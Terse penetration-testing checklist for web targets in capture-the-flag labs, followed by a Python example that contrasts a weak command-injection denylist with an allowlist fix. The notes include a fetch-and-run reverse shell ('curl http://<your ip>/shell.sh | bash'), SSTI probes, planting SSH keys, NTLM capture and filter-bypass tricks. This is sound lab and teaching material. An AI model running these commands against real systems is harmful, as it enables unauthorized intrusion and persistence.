• Is there maybe a walkthrough of what you’re trying to do? If so, just follow it; either way, Google and try to understand what you’re dealing with
  • check HTML source
  • search for possible username in website/HTML source
  • DNS name wrong maybe?
    • search for new domains on the website itself, something like web.box.htb
  • Wappalyzer
  • nikto
  • wpscan (--api-token <your WPScan API token>; keep the token out of shared notes)
  • Google version numbers of EVERYTHING
  • Gobuster!
  • DEFAULT PASSWORDS
  • inspect the links the website has… maybe some URL parameters like IDs?
  • Look for templates or any other way to input data; copy the request and send it to sqlmap
  • if possible upload a file and execute a reverse shell
    • If it doesn’t let you upload certain files, mess with the extension
    • later, to find where the uploaded file is, you can use Gobuster because sometimes it is renamed. Example: gobuster dir -u http://example.com/uploads/ -w wordlist, then Gobuster will search through the uploads directory.
    • https://www.revshells.com
    • you can do a reverse shell with curl: curl http://<your ip>/shell.sh | bash
    • sometimes you can’t get a shell because connections on other ports are blocked with a firewall; in that case try to use services that are already available, like ssh
    • you can generate ssh keys and upload the public key into the home directory of the user as authorized_keys
  • use different ASCII values for everything to avoid stupid bugs
  • Cookies
  • look for new directories in burpsuite target tab
  • if you find strings/documents, check for base64 and cyberchef magic
  • use Repeater
  • Hacktricks
  • LFI or RFI
  • SSTI
    • these can be anywhere. For any input you can provide, be it text, image, voice, OCR etc., check for SSTI by supplying things like {{7 * 7}} or $ {{7 * 7}}
  • XXE?
  • capture ssh keys also from LFI/RFI and XXE
  • capture windows NTLM (responder) also from LFI/RFI and XXE
  • API
    • APIs can sometimes execute system commands, but the input is filtered; try to bypass those filters, for example with \n in front of your command or a '.
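Added example (not from these notes): the denylist-style filter the last bullet describes, placed beside the allowlist-plus-argv form that actually closes the gap. The ping endpoint, the denylist and the function names are assumptions for illustration.

```python
import re
import subprocess

# Constructed denylist of the kind an API endpoint might apply before
# handing user input to a shell. It catches the obvious separators only.
DENYLIST = (";", "&", "|", "`", "$(")


def naive_filter_allows(user_input: str) -> bool:
    """Weak design: anything not on the denylist passes, including a leading
    newline or a stray quote, which a shell still treats as a separator."""
    return not any(bad in user_input for bad in DENYLIST)


# Allowlist: DNS hostname labels only (alnum and hyphen, no leading/trailing
# hyphen, 1-63 chars per label). Used with fullmatch, so no newline slips past.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_valid_hostname(user_input: str) -> bool:
    """Allowlist check: True only for a plain hostname of at most 253 chars."""
    return len(user_input) <= 253 and HOSTNAME_RE.fullmatch(user_input) is not None


def hardened_argv(user_input: str) -> list[str]:
    """Build an argument vector for subprocess.run(..., shell=False): the input
    is validated first and never parsed by a shell, so quotes, newlines and
    separators have no special meaning. A leading '-' is rejected by the
    allowlist, which also blocks argument injection."""
    if not is_valid_hostname(user_input):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", user_input]


def run_ping(user_input: str) -> subprocess.CompletedProcess:
    """Hardened endpoint body: no shell, validated argv, bounded runtime."""
    return subprocess.run(hardened_argv(user_input), capture_output=True,
                          text=True, timeout=10)


if __name__ == "__main__":
    for sample in ("example.com", "\nwhoami", "' whoami '"):
        print(repr(sample), "denylist passes:", naive_filter_allows(sample),
              "| allowlist passes:", is_valid_hostname(sample))
```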